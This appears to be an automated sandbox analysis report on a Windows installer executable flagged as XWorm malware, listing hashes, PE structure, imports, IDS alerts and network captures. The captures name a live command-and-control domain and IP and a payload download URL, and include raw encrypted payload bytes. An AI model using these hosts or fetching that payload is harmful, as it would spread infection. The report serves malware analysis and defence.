                                                                Preview:6.~........................................................E...............................x...............................................-...................}..............................O....k..............................................................X..................................).......Y...7.....................W......................................c...................................................................\....................0....................................4............~.........................................................................................Z...............................................W..............................p................I....R.............................9........................%............................................................."\.....................n......8................................C...............................................................b..............u..........................W.................
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):44084
                                                                Entropy (8bit):1.251987965137089
                                                                Encrypted:false
                                                                SSDEEP:384:H5J4r26NPfk3R0omoj53ZOmVFPACwEygLw6:b4igfY3wEy9
                                                                MD5:8E1ECD1CAD1A69BA46F3589D3EE05FCD
                                                                SHA1:511FE3218234DFD061C85834E32694D500A2D8CA
                                                                SHA-256:027B544D8E1F0A9CC480B455943CDB8B7F2E1E6FE64FA4E84C5FB22F58E75534
                                                                SHA-512:D4E8D21B29799A2FD6AA6B254B0E5F1E212F2CEFF6244D3AE1641F460A88FD39EC32AB04E3787BE6C313ABC85B76A2ECC90FA697C58B9899AEE59B16452D98F7
                                                                Malicious:false
                                                                Preview:....................................................................................................................g.....................t...................)...}..............................................................................................................O.f...............................r................................S...U................:........................................2................................................................7........................."....c.........-..........................>.........................j...........h...............................G2......P.......................qd.......................................................................................................................................\........................7.....................O..T;...LK.......j.........................................................Y..........................J...........................................................................
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.954369753521349
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:H33UCslPzv.exe
                                                                File size:3'212'629 bytes
                                                                MD5:9ecae0d26219ddb2355ad7b597887760
                                                                SHA1:3946b3ad9b7233bdda8053c2410d796bdc9fa21d
                                                                SHA256:462c6c970323f0e94eecb835032d8e993fca9ee0c6f944f656dfebde036479ed
                                                                SHA512:728a4282eed54bef2b75e61ef26104a81f036d89d474abf49db406260178d319480a505b1aac324caa92d93d3d2383ff69d064367c1f88bac16611fd21276bd1
                                                                SSDEEP:98304:EH5hTCwpsZGol4OU0HTVHzyCj+7BN72vBqx/Yapu5koUX:A20Rol4Sz1H+7j2JiFpu5kPX
                                                                TLSH:C8E533663341D538C21A53782422F67C673EDBA958081B677720BE697E33B91FF06D22
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........r.../...............+.......Rich............PE..L......].................b....9.....H2............@
                                                                Icon Hash:1e175ed66c3c9347
                                                                Entrypoint:0x403248
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x5DF6D4D5 [Mon Dec 16 00:50:29 2019 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:e9c0657252137ac61c1eeeba4c021000
                                                                Instruction
                                                                sub esp, 00000184h
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                xor ebx, ebx
                                                                push 00008001h
                                                                mov dword ptr [esp+18h], ebx
                                                                mov dword ptr [esp+10h], 0040A198h
                                                                mov dword ptr [esp+20h], ebx
                                                                mov byte ptr [esp+14h], 00000020h
                                                                call dword ptr [004080A0h]
                                                                call dword ptr [0040809Ch]
                                                                and eax, BFFFFFFFh
                                                                cmp ax, 00000006h
                                                                mov dword ptr [007A2F4Ch], eax
                                                                je 00007F2380D89533h
                                                                push ebx
                                                                call 00007F2380D8C61Bh
                                                                cmp eax, ebx
                                                                je 00007F2380D89529h
                                                                push 00000C00h
                                                                call eax
                                                                mov esi, 00408298h
                                                                push esi
                                                                call 00007F2380D8C597h
                                                                push esi
                                                                call dword ptr [00408098h]
                                                                lea esi, dword ptr [esi+eax+01h]
                                                                cmp byte ptr [esi], bl
                                                                jne 00007F2380D8950Dh
                                                                push 0000000Ah
                                                                call 00007F2380D8C5EFh
                                                                push 00000008h
                                                                call 00007F2380D8C5E8h
                                                                push 00000006h
                                                                mov dword ptr [007A2F44h], eax
                                                                call 00007F2380D8C5DCh
                                                                cmp eax, ebx
                                                                je 00007F2380D89531h
                                                                push 0000001Eh
                                                                call eax
                                                                test eax, eax
                                                                je 00007F2380D89529h
                                                                or byte ptr [007A2F4Fh], 00000040h
                                                                push ebp
                                                                call dword ptr [00408040h]
                                                                push ebx
                                                                call dword ptr [00408284h]
                                                                mov dword ptr [007A3018h], eax
                                                                push ebx
                                                                lea eax, dword ptr [esp+38h]
                                                                push 00000160h
                                                                push eax
                                                                push ebx
                                                                push 0079E508h
                                                                call dword ptr [00408178h]
                                                                push 0040A188h
                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84300xa0.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b60000x3ad78.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x294.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x60d80x6200e59663060e65803bb6474d2af98f8aa9False0.6750637755102041data6.467400856752681IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x80000x123e0x14007969015d02b2f673463f43156b28cdb4False0.428515625data5.032652926909017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0xa0000x3990580x4002d383339e780dfc9691f30584bbd0766unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .ndata0x3a40000x120000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x3b60000x3ad780x3ae00a32d901976697d7bbce42d8596684b1dFalse0.6666625199044586data6.294242973261698IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x3b63880x128aePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9988545095457538
                                                                RT_ICON0x3c8c380x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.4953714657518041
                                                                RT_ICON0x3d94600x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.5109049821315955
                                                                RT_ICON0x3e29080x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.5138170055452865
                                                                RT_ICON0x3e7d900x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.5477680680207841
                                                                RT_ICON0x3ebfb80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5617219917012448
                                                                RT_ICON0x3ee5600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6238273921200751
                                                                RT_ICON0x3ef6080x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6639344262295082
                                                                RT_ICON0x3eff900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7296099290780141
                                                                RT_DIALOG0x3f03f80x144dataEnglishUnited States0.5216049382716049
                                                                RT_DIALOG0x3f05400x100dataEnglishUnited States0.5234375
                                                                RT_DIALOG0x3f06400x11cdataEnglishUnited States0.6056338028169014
                                                                RT_DIALOG0x3f07600x60dataEnglishUnited States0.7291666666666666
                                                                RT_GROUP_ICON0x3f07c00x84Targa image data - Map 32 x 10414 x 1 +1EnglishUnited States0.7348484848484849
                                                                RT_VERSION0x3f08480x1f0MS Windows COFF PowerPC object fileEnglishUnited States0.4959677419354839
                                                                RT_MANIFEST0x3f0a380x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                DLLImport
                                                                KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetFileAttributesA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                                USER32.dllGetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
                                                                GDI32.dllSelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
                                                                SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                                ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-26T08:45:04.331057+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.958367TCP
                                                                2024-10-26T08:45:04.331057+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2112.221.146.1389402192.168.2.958367TCP
                                                                2024-10-26T08:45:09.209046+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.95836712.221.146.1389402TCP
                                                                2024-10-26T08:45:09.456365+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.958367TCP
                                                                2024-10-26T08:45:23.795545+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.958367TCP
                                                                2024-10-26T08:45:34.355458+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.958367TCP
                                                                2024-10-26T08:45:34.355458+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2112.221.146.1389402192.168.2.958367TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 26, 2024 08:44:29.077681065 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:29.077714920 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:29.077770948 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:29.094818115 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:29.094837904 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:30.221956968 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:30.222151041 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:30.286184072 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:30.286206007 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:30.286663055 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:30.286727905 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:30.292140961 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:30.339338064 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:30.675580978 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:30.675652027 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:30.675705910 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:30.675721884 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:30.675755024 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:30.675784111 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:30.849754095 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:30.849961042 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:30.934884071 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:30.935075045 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:31.051495075 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:31.051563025 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:31.051587105 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:31.051599979 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:31.051625967 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:31.051647902 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:31.051651001 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:31.051697016 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:31.068434954 CEST50132443192.168.2.9103.53.40.62
                                                                Oct 26, 2024 08:44:31.068454027 CEST44350132103.53.40.62192.168.2.9
                                                                Oct 26, 2024 08:44:55.359270096 CEST583679402192.168.2.912.221.146.138
                                                                Oct 26, 2024 08:44:55.365428925 CEST94025836712.221.146.138192.168.2.9
                                                                Oct 26, 2024 08:44:55.365516901 CEST583679402192.168.2.912.221.146.138
                                                                Oct 26, 2024 08:44:55.464358091 CEST583679402192.168.2.912.221.146.138
                                                                Oct 26, 2024 08:44:55.470969915 CEST94025836712.221.146.138192.168.2.9
                                                                Oct 26, 2024 08:45:04.331057072 CEST94025836712.221.146.138192.168.2.9
                                                                Oct 26, 2024 08:45:04.378631115 CEST583679402192.168.2.912.221.146.138
                                                                Oct 26, 2024 08:45:09.209045887 CEST583679402192.168.2.912.221.146.138
                                                                Oct 26, 2024 08:45:09.214927912 CEST94025836712.221.146.138192.168.2.9
                                                                Oct 26, 2024 08:45:09.456365108 CEST94025836712.221.146.138192.168.2.9
                                                                Oct 26, 2024 08:45:09.503691912 CEST583679402192.168.2.912.221.146.138
                                                                Oct 26, 2024 08:45:22.957272053 CEST583679402192.168.2.912.221.146.138
                                                                Oct 26, 2024 08:45:22.962677956 CEST94025836712.221.146.138192.168.2.9
                                                                Oct 26, 2024 08:45:23.795545101 CEST94025836712.221.146.138192.168.2.9
                                                                Oct 26, 2024 08:45:23.847517967 CEST583679402192.168.2.912.221.146.138
                                                                Oct 26, 2024 08:45:34.355458021 CEST94025836712.221.146.138192.168.2.9
                                                                Oct 26, 2024 08:45:34.410075903 CEST583679402192.168.2.912.221.146.138
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 26, 2024 08:43:38.604912996 CEST53639151.1.1.1192.168.2.9
                                                                Oct 26, 2024 08:44:28.566436052 CEST4978353192.168.2.91.1.1.1
                                                                Oct 26, 2024 08:44:29.068017960 CEST53497831.1.1.1192.168.2.9
                                                                Oct 26, 2024 08:44:35.569907904 CEST5080753192.168.2.91.1.1.1
                                                                Oct 26, 2024 08:44:36.566616058 CEST5080753192.168.2.91.1.1.1
                                                                Oct 26, 2024 08:44:37.581980944 CEST5080753192.168.2.91.1.1.1
                                                                Oct 26, 2024 08:44:39.580013037 CEST53508071.1.1.1192.168.2.9
                                                                Oct 26, 2024 08:44:39.580029011 CEST53508071.1.1.1192.168.2.9
                                                                Oct 26, 2024 08:44:39.580037117 CEST53508071.1.1.1192.168.2.9
                                                                Oct 26, 2024 08:44:39.926474094 CEST5056853192.168.2.91.1.1.1
                                                                Oct 26, 2024 08:44:40.925668001 CEST5056853192.168.2.91.1.1.1
                                                                Oct 26, 2024 08:44:41.954509974 CEST5056853192.168.2.91.1.1.1
                                                                Oct 26, 2024 08:44:43.936058044 CEST53505681.1.1.1192.168.2.9
                                                                Oct 26, 2024 08:44:43.936080933 CEST53505681.1.1.1192.168.2.9
                                                                Oct 26, 2024 08:44:43.936089993 CEST53505681.1.1.1192.168.2.9
                                                                Oct 26, 2024 08:44:48.536258936 CEST5803053192.168.2.91.1.1.1
                                                                Oct 26, 2024 08:44:49.535157919 CEST5803053192.168.2.91.1.1.1
                                                                Oct 26, 2024 08:44:49.542370081 CEST53580301.1.1.1192.168.2.9
                                                                Oct 26, 2024 08:44:52.546559095 CEST53580301.1.1.1192.168.2.9
                                                                Oct 26, 2024 08:44:54.739025116 CEST5184953192.168.2.91.1.1.1
                                                                Oct 26, 2024 08:44:55.358004093 CEST53518491.1.1.1192.168.2.9
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 26, 2024 08:44:28.566436052 CEST192.168.2.91.1.1.10x3400Standard query (0)apslline.comA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:35.569907904 CEST192.168.2.91.1.1.10xb367Standard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:36.566616058 CEST192.168.2.91.1.1.10xb367Standard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:37.581980944 CEST192.168.2.91.1.1.10xb367Standard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:39.926474094 CEST192.168.2.91.1.1.10xcb1aStandard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:40.925668001 CEST192.168.2.91.1.1.10xcb1aStandard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:41.954509974 CEST192.168.2.91.1.1.10xcb1aStandard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:48.536258936 CEST192.168.2.91.1.1.10xc71eStandard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:49.535157919 CEST192.168.2.91.1.1.10xc71eStandard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:54.739025116 CEST192.168.2.91.1.1.10xc22fStandard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 26, 2024 08:44:29.068017960 CEST1.1.1.1192.168.2.90x3400No error (0)apslline.com103.53.40.62A (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:39.580013037 CEST1.1.1.1192.168.2.90xb367Server failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:39.580029011 CEST1.1.1.1192.168.2.90xb367Server failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:39.580037117 CEST1.1.1.1192.168.2.90xb367Server failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:43.936058044 CEST1.1.1.1192.168.2.90xcb1aServer failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:43.936080933 CEST1.1.1.1192.168.2.90xcb1aServer failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:43.936089993 CEST1.1.1.1192.168.2.90xcb1aServer failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:52.546559095 CEST1.1.1.1192.168.2.90xc71eServer failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                Oct 26, 2024 08:44:55.358004093 CEST1.1.1.1192.168.2.90xc22fNo error (0)xwor3july.duckdns.org12.221.146.138A (IP address)IN (0x0001)false
                                                                • apslline.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.950132103.53.40.624435968C:\Users\user\Desktop\H33UCslPzv.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-26 06:44:30 UTC174OUTGET /LfGiMdRCMSvlQHkIpf170.bin HTTP/1.1
                                                                User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: apslline.com
                                                                Cache-Control: no-cache
                                                                2024-10-26 06:44:30 UTC248INHTTP/1.1 200 OK
                                                                Date: Sat, 26 Oct 2024 06:44:30 GMT
                                                                Server: Apache
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Last-Modified: Sat, 12 Oct 2024 18:13:57 GMT
                                                                Accept-Ranges: bytes
                                                                Content-Length: 34368
                                                                Content-Type: application/octet-stream
                                                                2024-10-26 06:44:30 UTC7944INData Raw: b4 cc 81 6b 2b c5 ca 92 33 f6 f5 19 a9 8f 73 07 dd df 64 22 2a 70 33 20 60 b4 85 65 f2 8d 9f 4f de c7 71 8e 08 27 8a cd 5d a1 55 1c b2 0f 86 3b 66 a1 1c 89 6b 47 f2 ad b0 ad 9a d4 f9 3a 4d c8 14 75 01 67 03 41 cb 70 11 12 9b ba 6f c5 01 48 e3 46 98 fb ee c6 97 32 1f 69 48 ac ca 73 68 14 7b 10 ea f3 99 ad 6a 22 05 01 c7 70 0f ce dd 19 c0 50 c5 5f 3e 9b bd eb be 94 33 f0 8d 57 f2 8e e3 c9 b7 b4 c3 8a 0a 6e 34 e2 81 e8 72 57 c3 bd d1 da f0 70 78 fa b2 9c 3a 46 fb 12 d5 ec 4b 48 42 9f e3 97 85 0a 36 5e ac d1 be c7 90 4a 37 bc 9e d9 98 f0 cc 4f 10 63 5a 4e f7 c1 1c 8d 90 d9 02 dc ad 87 85 fc 8b a9 cb 79 10 1e 0f 97 4d 31 00 19 ec 12 89 4a c3 a4 3c 7b 59 f1 c9 fe 5f 87 ac a6 7a e8 b9 b6 2d d5 c3 2a b2 05 69 ac 25 2c 3d 50 9d 51 1d ff 9c 03 29 9b 17 43 6a 4e 7f
                                                                Data Ascii: k+3sd"*p3 `eOq']U;fkG:MugApoHF2iHsh{j"pP_>3Wn4rWpx:FKHB6^J7OcZNyM1J<{Y_z-*i%,=PQ)CjN
                                                                2024-10-26 06:44:30 UTC8000INData Raw: 86 33 f5 f4 9f 53 e3 42 77 fa 68 34 96 87 98 23 6f d1 27 72 0b ea ee ed 2b 28 3b 5a 5c ae 0d a9 78 dd 93 6d 93 00 67 cc 60 6b 5d ef ba 23 99 40 72 36 02 23 a2 2d 5e d0 d4 47 a0 7d 00 0a 58 a9 8c 2a 30 57 32 1c 3b f1 cd 76 21 48 94 92 09 de 8c 4a cb d1 5b a0 8c 96 97 74 5c b2 cd d4 ec eb 21 5f 00 70 f6 91 88 c6 53 e5 9e 50 ac 39 64 e7 dd 5d b7 15 5e fa 3b ce aa 77 85 cf 97 fe 7d 12 b6 2f 93 17 5a 50 43 1c c4 21 c7 e6 52 8d 7a f5 a5 fa 50 a5 c4 8e d4 ea 4f 71 6a 0a b8 58 dc 25 04 39 cd a2 29 cb fc b5 63 a7 09 d0 3e 1e 9d 40 65 85 1f e5 2a 5b dd 18 4a 82 1d 26 87 04 fc 50 cc e4 e2 cd 6e d1 50 29 e8 8b 2b 87 e2 18 ea d0 dd 72 52 66 ec 21 86 4a 0d e0 9a 36 1c 61 c7 fe cc e0 86 e7 b1 46 7a 92 9f 6a cc fa 53 09 a5 b6 1b 44 e4 c3 2b 8b 10 33 18 e6 06 e4 36 63 b3
                                                                Data Ascii: 3SBwh4#o'r+(;Z\xmg`k]#@r6#-^G}X*0W2;v!HJ[t\!_pSP9d]^;w}/ZPC!RzPOqjX%9)c>@e*[J&PnP)+rRf!J6aFzjSD+36c
                                                                2024-10-26 06:44:30 UTC8000INData Raw: 74 c4 00 9e f8 5b 29 32 38 c5 98 bb 84 87 94 5f 85 e7 38 d2 9a 5c a7 ce 70 da 12 26 ea ed 42 d6 42 2a d8 17 2e 49 85 b5 1b 17 07 8c 03 92 2f 8c 22 af 4d 92 26 5a fd fd 33 d6 b5 c4 bb c1 bb 7d 1c 77 1c 0d 93 0f 5c cd 15 85 f4 93 c6 b6 95 f2 b4 b4 04 3e 95 f2 f6 fb 93 32 60 00 53 8e c8 7d 41 0d d2 41 5e 99 a3 97 d1 c8 4a fc 74 7b c1 cd 05 5b 28 29 4c 1e 89 57 b2 c7 a0 17 d7 a1 64 35 d5 02 e4 d1 04 44 c0 48 8a aa 0c 95 93 8e bd 0a 27 0c 83 b6 91 6f a7 97 a6 66 56 f7 db 03 04 6b 0f 4e 04 66 f0 a9 cf 32 f9 44 1c ef 02 2e 7a 95 d8 53 21 a4 d1 41 08 d5 88 7b 56 37 64 41 e4 a7 0d 6b e8 76 3e f5 fa eb 10 7b 48 4d a5 68 ac d6 d0 ff 12 05 a1 fd 5d ea 28 30 9a a1 9b 53 43 9a 5c fd 6f 1c 4d 83 98 29 4f fb 94 76 0a f6 e9 ed 90 2c 3d 5a 48 8c cb a1 5e dd 92 6c 7b 04 e7
                                                                Data Ascii: t[)28_8\p&BB*.I/"M&Z3}w\>2`S}AA^Jt{[()LWd5DH'ofVkNf2D.zS!A{V7dAkv>{HMh](0SC\oM)Ov,=ZH^l{
